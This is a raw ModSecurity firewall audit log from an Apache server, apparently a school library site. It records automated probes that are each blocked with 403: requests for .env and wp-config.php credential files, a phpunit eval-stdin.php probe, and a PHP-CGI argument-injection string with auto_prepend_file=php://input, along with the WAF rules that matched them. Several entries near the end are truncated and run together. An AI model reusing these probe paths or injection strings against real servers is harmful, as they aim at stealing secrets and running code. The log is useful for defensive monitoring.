Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146676016 --c32ef254-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c32ef254-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949240618459 838 (- - -) Stopwatch2: 1746949240618459 838; combined=326, p1=287, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c32ef254-Z-- --89ef023b-A-- [11/May/2025:14:40:45 +0700] aCBUfU8xOExV7lPH_Dl_6gAAANc 103.236.140.4 54632 103.236.140.4 8181 --89ef023b-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146676019 --89ef023b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --89ef023b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949245474882 827 (- - -) Stopwatch2: 1746949245474882 827; combined=314, p1=275, p2=0, p3=0, p4=0, p5=38, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89ef023b-Z-- --8ab43e1d-A-- [11/May/2025:14:40:49 +0700] aCBUgQpy530QiWmSS61dNAAAAEE 103.236.140.4 54636 103.236.140.4 8181 --8ab43e1d-B-- GET /config/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146676022 --8ab43e1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8ab43e1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949249575460 698 (- - -) Stopwatch2: 1746949249575460 698; combined=261, p1=232, p2=0, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ab43e1d-Z-- --e69c8242-A-- [11/May/2025:14:40:58 +0700] aCBUigpy530QiWmSS61dNQAAAEk 103.236.140.4 54640 103.236.140.4 8181 --e69c8242-B-- GET /admin/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146676025 --e69c8242-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e69c8242-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949258773152 796 (- - -) Stopwatch2: 1746949258773152 796; combined=322, p1=291, p2=0, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e69c8242-Z-- --1b9d1c05-A-- [11/May/2025:14:41:07 +0700] aCBUk0EuxCpmyy5aJPm7nwAAABg 103.236.140.4 54644 103.236.140.4 8181 --1b9d1c05-B-- GET /perpustakaan/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146676028 --1b9d1c05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1b9d1c05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949267499349 820 (- - -) Stopwatch2: 1746949267499349 820; combined=330, p1=291, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b9d1c05-Z-- --e0983b54-A-- [11/May/2025:14:41:15 +0700] aCBUm08xOExV7lPH_Dl_6wAAAMY 103.236.140.4 54650 103.236.140.4 8181 --e0983b54-B-- GET /smkn22jakarta/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146548948 --e0983b54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e0983b54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949275061994 777 (- - -) Stopwatch2: 1746949275061994 777; combined=313, p1=278, p2=0, p3=0, p4=0, p5=35, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0983b54-Z-- --7443873a-A-- [11/May/2025:14:58:14 +0700] aCBYlgpy530QiWmSS61eCAAAAFI 103.236.140.4 57892 103.236.140.4 8181 --7443873a-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --7443873a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7443873a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746950294763744 883 (- - -) Stopwatch2: 1746950294763744 883; combined=346, p1=309, p2=0, p3=0, p4=0, p5=37, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7443873a-Z-- --3a2d3c31-A-- [11/May/2025:15:10:11 +0700] aCBbYwpy530QiWmSS61eCgAAAFE 103.236.140.4 57928 103.236.140.4 8181 --3a2d3c31-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Accept-Charset: utf-8 --3a2d3c31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a2d3c31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746951011119864 868 (- - -) Stopwatch2: 1746951011119864 868; combined=341, p1=299, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a2d3c31-Z-- --d8ad5125-A-- [11/May/2025:15:39:55 +0700] aCBiW-bs1CLLACKj-_zQwQAAAJE 103.236.140.4 58072 103.236.140.4 8181 --d8ad5125-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.199.72.27 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.199.72.27 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --d8ad5125-C-- --d8ad5125-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8ad5125-E-- --d8ad5125-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746952795957694 4834 (- - -) Stopwatch2: 1746952795957694 4834; combined=3042, p1=446, p2=2561, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8ad5125-Z-- --8be95b05-A-- [11/May/2025:18:17:44 +0700] aCCHWObs1CLLACKj-_zR2wAAAJA 103.236.140.4 60982 103.236.140.4 8181 --8be95b05-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 31.56.56.153 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8be95b05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8be95b05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746962264390692 942 (- - -) Stopwatch2: 1746962264390692 942; combined=351, p1=305, p2=0, p3=0, p4=0, p5=46, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8be95b05-Z-- --be14a528-A-- [11/May/2025:18:49:58 +0700] aCCO5gpy530QiWmSS61tDgAAAEU 103.236.140.4 58816 103.236.140.4 8181 --be14a528-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.85.22 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.85.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --be14a528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be14a528-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746964198117914 766 (- - -) Stopwatch2: 1746964198117914 766; combined=303, p1=246, p2=0, p3=0, p4=0, p5=57, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be14a528-Z-- --69e8fa5a-A-- [11/May/2025:19:34:59 +0700] aCCZc08xOExV7lPH_DmUCQAAAMs 103.236.140.4 41034 103.236.140.4 8181 --69e8fa5a-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 160.202.33.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 160.202.33.87 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --69e8fa5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69e8fa5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746966899205500 933 (- - -) Stopwatch2: 1746966899205500 933; combined=360, p1=320, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69e8fa5a-Z-- --e1c9f900-A-- [11/May/2025:22:37:35 +0700] aCDEP-bs1CLLACKj-_zp1QAAAJM 103.236.140.4 47520 103.236.140.4 8181 --e1c9f900-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3888.0 Safari/537.36 Accept-Charset: utf-8 --e1c9f900-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1c9f900-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746977855888451 791 (- - -) Stopwatch2: 1746977855888451 791; combined=334, p1=295, p2=0, p3=0, p4=0, p5=38, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1c9f900-Z-- --3a5a6c69-A-- [11/May/2025:22:45:57 +0700] aCDGNQpy530QiWmSS615UQAAAEs 103.236.140.4 47554 103.236.140.4 8181 --3a5a6c69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 Accept-Charset: utf-8 --3a5a6c69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a5a6c69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746978357669598 784 (- - -) Stopwatch2: 1746978357669598 784; combined=322, p1=280, p2=0, p3=0, p4=0, p5=42, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a5a6c69-Z-- --81457206-A-- [11/May/2025:22:56:35 +0700] aCDIs-bs1CLLACKj-_zp2QAAAI8 103.236.140.4 47566 103.236.140.4 8181 --81457206-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.128.35.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.128.35.126 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --81457206-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81457206-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746978995706368 799 (- - -) Stopwatch2: 1746978995706368 799; combined=309, p1=268, p2=0, p3=0, p4=0, p5=40, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81457206-Z-- --55173120-A-- [11/May/2025:23:17:53 +0700] aCDNsebs1CLLACKj-_zp4wAAAJY 103.236.140.4 47686 103.236.140.4 8181 --55173120-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36 Accept-Charset: utf-8 --55173120-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55173120-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746980273453119 929 (- - -) Stopwatch2: 1746980273453119 929; combined=430, p1=390, p2=0, p3=0, p4=0, p5=40, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55173120-Z-- --5d31ae7f-A-- [11/May/2025:23:24:34 +0700] aCDPQgpy530QiWmSS615bwAAAFc 103.236.140.4 47702 103.236.140.4 8181 --5d31ae7f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G960U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --5d31ae7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d31ae7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746980674408146 753 (- - -) Stopwatch2: 1746980674408146 753; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d31ae7f-Z-- --93484034-A-- [12/May/2025:00:22:21 +0700] aCDczU8xOExV7lPH_DmWxQAAAMU 103.236.140.4 47912 103.236.140.4 8181 --93484034-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.194 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --93484034-C-- --93484034-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93484034-E-- --93484034-H-- Message: Access denied with code 403 (phase 2). String match " --bcb3222c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcb3222c-E-- --bcb3222c-H-- Message: Access denied with code 403 (phase 2). String match " --0fc59d57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fc59d57-E-- --0fc59d57-H-- Message: Access denied with code 403 (phase 2). String match " --81474f2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81474f2f-H-- Message: Access denied with code 403 (phase 2). String match " --989f8716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --989f8716-E-- --989f8716-H-- Message: Access denied with code 403 (phase 2). String match " --2ab61b48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ab61b48-E-- --2ab61b48-H-- Message: Access denied with code 403 (phase 2). String match " --40d1bb1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40d1bb1c-H-- Message: Access denied with code 403 (phase 2). String match " --18adb35c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18adb35c-E-- --18adb35c-H-- Message: Access denied with code 403 (phase 2). String match " --9185033d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9185033d-E-- --9185033d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746994930790873 5118 (- - -) Stopwatch2: 1746994930790873 5118; combined=3322, p1=545, p2=2742, p3=0, p4=0, p5=34, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked 